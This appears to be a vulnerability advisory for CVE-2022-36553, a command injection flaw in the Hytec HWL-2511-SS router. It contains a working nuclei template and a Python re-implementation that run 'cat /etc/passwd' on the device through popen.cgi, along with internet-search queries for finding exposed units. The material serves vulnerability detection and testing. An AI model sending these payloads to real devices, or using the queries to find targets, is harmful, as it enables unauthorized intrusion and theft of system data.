CVE-2022-36553: Hytec Inter HWL-2511-SS - Remote Command Execution

Date: 2025-08-01 | Affected software: Hytec Inter HWL 2511 SS | PoC: public

Vulnerability description

Hytec Inter HWL-2511-SS firmware v1.05 and below contains an unauthenticated OS command injection vulnerability (CWE-77) in the component /www/cgi-bin/popen.cgi: the value of the `command` query parameter is executed on the device and its output is returned in the HTTP response, as the PoC below demonstrates with `cat /etc/passwd`.

PoC code [public]

id: CVE-2022-36553

info:
  name: Hytec Inter HWL-2511-SS - Remote Command Execution
  author: HuTa0
  severity: critical
  description: |
    Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36553
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml
    - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b
    - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html
    - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-36553
    cwe-id: CWE-77
    epss-score: 0.93013
    epss-percentile: 0.99769
    cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: hytec
    product: hwl-2511-ss_firmware
    fofa-query: title="index" && header="lighttpd/1.4.30"
    zoomeye-query: app="Hytec Inter HWL-2511-SS"
  tags: cve2022,cve,hytec,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      command:
        - "cat%20/etc/passwd"
        - "type%20C://Windows/win.ini"
    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "contains(body_1, '<title>index</title>')"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
          - "contains(body_1, '<title>index</title>')"
        condition: and
# digest: 4b0a00483046022100fbca4d00c71941eaba3839c559e9cb97c56107f1ada84cfb2b86f543d148432402210089a7676824794e957716b991107ff2a1ef7174d1e720392aa037b77e5f8ac51c:922c64590222798bb761d5b6d8e72950
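The nuclei template above, re-expressed as a small Python checker so the request construction and the two matcher branches can be read and exercised offline. This is an added example and is not part of the original page, the nuclei project, or the vendor's code. The path, cache-busting query string, payloads, and match strings are taken from the template; the `Response` class, the `simulated_vulnerable` and `simulated_patched` fake devices, the sample index page and passwd text, and the `http_fetch` transport are assumptions constructed for illustration.

```python
"""CVE-2022-36553 check, mirroring the nuclei template's logic (added example).

Transport is injected as a callable so the matcher logic can run against
constructed responses; nothing here was captured from real hardware.
"""
import re
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import quote

CGI_PATH = "/cgi-bin/popen.cgi"
CACHE_BUSTER = "v=0.1303033443137912"        # same query suffix the template sends
PAYLOADS = ["cat /etc/passwd", "type C://Windows/win.ini"]
FINGERPRINT = "<title>index</title>"         # template: contains(body_1, ...)


@dataclass
class Response:
    status: int
    body: str


Fetch = Callable[[str], Response]            # request path (with query) -> Response


def build_path(command: str) -> str:
    """Percent-encode the command as the template does (space -> %20, '/' and ':' kept)."""
    return f"{CGI_PATH}?command={quote(command, safe='/:')}&{CACHE_BUSTER}"


def passwd_leaked(resp: Response) -> bool:
    """First matcher branch: regex('root:.*:0:0:', body) and status_code == 200."""
    return resp.status == 200 and re.search(r"root:.*:0:0:", resp.body) is not None


def winini_leaked(resp: Response) -> bool:
    """Second matcher branch: the three win.ini markers and status_code == 200."""
    return resp.status == 200 and all(
        s in resp.body for s in ("bit app support", "fonts", "extensions"))


MATCHERS = {PAYLOADS[0]: passwd_leaked, PAYLOADS[1]: winini_leaked}


def check_host(fetch: Fetch) -> Optional[str]:
    """Return the payload whose output came back, or None (stop-at-first-match)."""
    index = fetch("/")
    if FINGERPRINT not in index.body:        # not the router's landing page: skip
        return None
    for cmd in PAYLOADS:
        if MATCHERS[cmd](fetch(build_path(cmd))):
            return cmd
    return None


# --- constructed fake devices (assumptions, not real captures) -----------------
INDEX_PAGE = "<html><head><title>index</title></head><body>login</body></html>"
PASSWD_OUTPUT = ("root:x:0:0:root:/root:/bin/sh\n"
                 "nobody:x:65534:65534:nobody:/nonexistent:/bin/false\n")


def simulated_vulnerable(path: str) -> Response:
    """Fake device that echoes the output of ?command= (constructed)."""
    if path == "/":
        return Response(200, INDEX_PAGE)
    if path.startswith(CGI_PATH) and "command=cat%20/etc/passwd" in path:
        return Response(200, PASSWD_OUTPUT)
    return Response(200, "")                  # unknown command: empty popen output


def simulated_patched(path: str) -> Response:
    """Same fingerprint, but the CGI refuses the request (constructed)."""
    if path == "/":
        return Response(200, INDEX_PAGE)
    return Response(403, "Forbidden")


def http_fetch(base_url: str, timeout: float = 5.0) -> Fetch:
    """Live transport (assumed helper) for a host you are authorized to test."""
    import urllib.error
    import urllib.request

    def fetch(path: str) -> Response:
        try:
            with urllib.request.urlopen(base_url + path, timeout=timeout) as r:
                return Response(r.status, r.read().decode(errors="replace"))
        except urllib.error.HTTPError as e:
            return Response(e.code, e.read().decode(errors="replace"))
    return fetch


if __name__ == "__main__":
    print(check_host(simulated_vulnerable))   # cat /etc/passwd
    print(check_host(simulated_patched))      # None
    # Live use: print(check_host(http_fetch("http://192.0.2.10")))
```

Two details worth noting when comparing this with the template. `max-request: 4` reflects that nuclei re-sends both raw requests for each of the two payloads; the checker above fetches the landing page once and reuses it. The second payload is a Windows `type` command that cannot succeed on this Linux/lighttpd device; it is kept only because the template carries it, and on a real target the decision will be made by the `cat /etc/passwd` branch.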